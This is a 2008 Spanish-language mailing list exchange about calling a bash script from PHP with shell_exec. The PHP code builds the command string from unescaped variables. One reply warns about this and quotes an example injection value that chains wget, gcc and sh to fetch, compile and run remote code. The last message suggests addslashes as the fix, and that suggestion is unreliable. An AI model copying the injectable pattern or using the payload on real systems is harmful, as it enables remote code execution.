[eside-ghost] String demasiados largos desde php a shell bash
Fran Mosteiro
framosval en gmail.com
Mie Abr 2 13:26:58 CEST 2008
Buenas!!
No no .... en el servidor escapando ^^. Yo he encontrado por ahi la funcion
addslashes que parece que hace algo parecido tb.
Muchas gracias de nuevo.
El día 2/04/08, ALi <osatien en gmail.com> escribió:
>
> On 4/2/08, Fran Mosteiro <framosval en gmail.com> wrote:
> > Buenas!
> > ALi..... acabo de enamorarme de ti por cmpleto (ehehehehe, en sentido
> > figurado eh! xDDDD). Lo he puesto como me comentabas:
> > shell_exec("newSearch.sh $p1 $p2 $p3 $p4 $p5 $p6 $p7 $p8 '$p9'") ... con
> las
> > comillas en '$9' y va como un tiro.
> > Muchisimas gracias!!!!
> >
> > PD: en realidad el exec es:
> > $query = "newSearch.sh $p1 $p2 $p3 $p4 $p5 $p6 $p7 $p8 '$p9'";
> > shell_exec($query); // :P
>
>
> Yo tambien te quiero, pero me dices en que servidor vas a poner eso?
> xk sigues sin escapar los parametros ...... txipi me da que
> amablamente te dice como escapar eso en php, yo no lo se .....
> supongamos que en $p2 te ponen "param2;wget http://exploit;gcc exploit
> -o kk;sh ./kk;" y si luego se conectan a la maquina .....
> nunca esta de mas en pensar como un paranoico :S
>
>
> Saludos
>
> _______________________________________________
> eside-ghost mailing list
> eside-ghost en deusto.es
> https://listas.deusto.es/mailman/listinfo/eside-ghost
>
--
--
Un saludo,
\\********************************************************
Juan Francisco Mosteiro Valdés
Correo --> framosval en gmail.com
--> fran.mosteiro en gmail.com
Blog--> http://elrincondebarak.blospot.com
\\*********************************************************
" No es sabio el que sabe sino el que no sabe y quiere aprender. "
------------ próxima parte ------------
Se ha borrado un adjunto en formato HTML...
URL: https://listas.deusto.es/mailman/private/eside-ghost/attachments/20080402/1878e03e/attachment-0001.htm
Más información sobre la lista de distribución eside-ghost